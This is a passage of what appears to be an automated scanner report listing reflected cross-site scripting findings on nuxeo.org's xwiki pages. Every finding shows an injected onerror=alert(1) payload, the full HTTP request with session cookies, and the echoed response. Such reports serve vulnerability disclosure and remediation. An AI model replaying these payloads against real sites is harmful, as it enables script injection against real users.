Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/XWiki/JaneZupan

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 90042<img%20src%3da%20onerror%3dalert(1)>f4f08861abe was submitted in the REST URL parameter 4. This input was echoed as 90042<img src=a onerror=alert(1)>f4f08861abe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/XWiki90042<img%20src%3da%20onerror%3dalert(1)>f4f08861abe/JaneZupan HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:08 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12910
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/XWiki90042%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ef4f08861abe/">XWiki90042<img src=a onerror=alert(1)>f4f08861abe</a>
...[SNIP]...

1.137. http://www.nuxeo.org/xwiki/bin/view/XWiki/JaneZupan [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/XWiki/JaneZupan

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload febcb"><img%20src%3da%20onerror%3dalert(1)>50bdafe04d3 was submitted in the REST URL parameter 4. This input was echoed as febcb"><img src=a onerror=alert(1)>50bdafe04d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/XWikifebcb"><img%20src%3da%20onerror%3dalert(1)>50bdafe04d3/JaneZupan HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:12 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12976
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/XWikifebcb%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E50bdafe04d3/JaneZupan?format=xar&amp;name=XWikifebcb"><img src=a onerror=alert(1)>50bdafe04d3.JaneZupan&amp;pages=XWikifebcb">
...[SNIP]...

1.138. http://www.nuxeo.org/xwiki/bin/view/XWiki/JaneZupan [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/XWiki/JaneZupan

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 29e70<img%20src%3da%20onerror%3dalert(1)>3e0dea1fff1 was submitted in the REST URL parameter 5. This input was echoed as 29e70<img src=a onerror=alert(1)>3e0dea1fff1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/XWiki/JaneZupan29e70<img%20src%3da%20onerror%3dalert(1)>3e0dea1fff1 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:18:39 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12898
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/XWiki/JaneZupan29e70%3Cimg+src%3Da+onerror%3Dalert%281%29%3E3e0dea1fff1'>JaneZupan29e70<img src=a onerror=alert(1)>3e0dea1fff1</a>
...[SNIP]...

1.139. http://www.nuxeo.org/xwiki/bin/view/XWiki/JaneZupan [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/XWiki/JaneZupan

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2299e"><img%20src%3da%20onerror%3dalert(1)>dafd44348ed was submitted in the REST URL parameter 5. This input was echoed as 2299e"><img src=a onerror=alert(1)>dafd44348ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/XWiki/JaneZupan2299e"><img%20src%3da%20onerror%3dalert(1)>dafd44348ed HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:42 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12960
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/XWiki/JaneZupan2299e%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Edafd44348ed?format=xar&amp;name=XWiki.JaneZupan2299e"><img src=a onerror=alert(1)>dafd44348ed&amp;pages=XWiki.JaneZupan2299e">
...[SNIP]...

1.140. http://www.nuxeo.org/xwiki/bin/view/XWiki/LiseKemen [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/XWiki/LiseKemen

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f82cb<img%20src%3da%20onerror%3dalert(1)>e26b388e520 was submitted in the REST URL parameter 4. This input was echoed as f82cb<img src=a onerror=alert(1)>e26b388e520 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/XWikif82cb<img%20src%3da%20onerror%3dalert(1)>e26b388e520/LiseKemen HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:04 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12910
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/XWikif82cb%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ee26b388e520/">XWikif82cb<img src=a onerror=alert(1)>e26b388e520</a>
...[SNIP]...

1.141. http://www.nuxeo.org/xwiki/bin/view/XWiki/LiseKemen [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/XWiki/LiseKemen

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ad3d"><img%20src%3da%20onerror%3dalert(1)>d2452f8f639 was submitted in the REST URL parameter 4. This input was echoed as 5ad3d"><img src=a onerror=alert(1)>d2452f8f639 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/XWiki5ad3d"><img%20src%3da%20onerror%3dalert(1)>d2452f8f639/LiseKemen HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:19 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12976
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/XWiki5ad3d%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ed2452f8f639/LiseKemen?format=xar&amp;name=XWiki5ad3d"><img src=a onerror=alert(1)>d2452f8f639.LiseKemen&amp;pages=XWiki5ad3d">
...[SNIP]...

1.142. http://www.nuxeo.org/xwiki/bin/view/XWiki/LiseKemen [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/XWiki/LiseKemen

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f67e"><img%20src%3da%20onerror%3dalert(1)>480fe619997 was submitted in the REST URL parameter 5. This input was echoed as 2f67e"><img src=a onerror=alert(1)>480fe619997 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/XWiki/LiseKemen2f67e"><img%20src%3da%20onerror%3dalert(1)>480fe619997 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:52 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12960
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/XWiki/LiseKemen2f67e%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E480fe619997?format=xar&amp;name=XWiki.LiseKemen2f67e"><img src=a onerror=alert(1)>480fe619997&amp;pages=XWiki.LiseKemen2f67e">
...[SNIP]...

1.143. http://www.nuxeo.org/xwiki/bin/view/XWiki/LiseKemen [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/XWiki/LiseKemen

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f7c5f<img%20src%3da%20onerror%3dalert(1)>e5413791935 was submitted in the REST URL parameter 5. This input was echoed as f7c5f<img src=a onerror=alert(1)>e5413791935 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/XWiki/LiseKemenf7c5f<img%20src%3da%20onerror%3dalert(1)>e5413791935 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:37 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12898
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/XWiki/LiseKemenf7c5f%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ee5413791935'>LiseKemenf7c5f<img src=a onerror=alert(1)>e5413791935</a>
...[SNIP]...

1.144. http://www.nuxeo.org/xwiki/bin/view/skins/toucan [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/skins/toucan

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2182"><img%20src%3da%20onerror%3dalert(1)>af9c268fe39 was submitted in the REST URL parameter 4. This input was echoed as a2182"><img src=a onerror=alert(1)>af9c268fe39 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/skinsa2182"><img%20src%3da%20onerror%3dalert(1)>af9c268fe39/toucan HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:59 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12937
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/skinsa2182%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Eaf9c268fe39/toucan?format=xar&amp;name=skinsa2182"><img src=a onerror=alert(1)>af9c268fe39.toucan&amp;pages=skinsa2182">
...[SNIP]...

1.145. http://www.nuxeo.org/xwiki/bin/view/skins/toucan [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/skins/toucan

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a8e50<img%20src%3da%20onerror%3dalert(1)>a4e8dc4d729 was submitted in the REST URL parameter 4. This input was echoed as a8e50<img src=a onerror=alert(1)>a4e8dc4d729 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/skinsa8e50<img%20src%3da%20onerror%3dalert(1)>a4e8dc4d729/toucan HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:55 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12871
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/skinsa8e50%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ea4e8dc4d729/">skinsa8e50<img src=a onerror=alert(1)>a4e8dc4d729</a>
...[SNIP]...

1.146. http://www.nuxeo.org/xwiki/bin/view/skins/toucan [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/skins/toucan

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c090"><img%20src%3da%20onerror%3dalert(1)>927538bfc55 was submitted in the REST URL parameter 5. This input was echoed as 6c090"><img src=a onerror=alert(1)>927538bfc55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/skins/toucan6c090"><img%20src%3da%20onerror%3dalert(1)>927538bfc55 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:32 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12921
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/skins/toucan6c090%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E927538bfc55?format=xar&amp;name=skins.toucan6c090"><img src=a onerror=alert(1)>927538bfc55&amp;pages=skins.toucan6c090">
...[SNIP]...

1.147. http://www.nuxeo.org/xwiki/bin/view/skins/toucan [REST URL parameter 5]  previous

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/skins/toucan

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e9b27<img%20src%3da%20onerror%3dalert(1)>b14aaf13493 was submitted in the REST URL parameter 5. This input was echoed as e9b27<img src=a onerror=alert(1)>b14aaf13493 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/skins/toucane9b27<img%20src%3da%20onerror%3dalert(1)>b14aaf13493 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:18:43 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12859
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/skins/toucane9b27%3Cimg+src%3Da+onerror%3Dalert%281%29%3Eb14aaf13493'>toucane9b27<img src=a onerror=alert(1)>b14aaf13493</a>
...[SNIP]...

Report generated by XSS.CX at Mon Nov 15 09:29:35 CST 2010.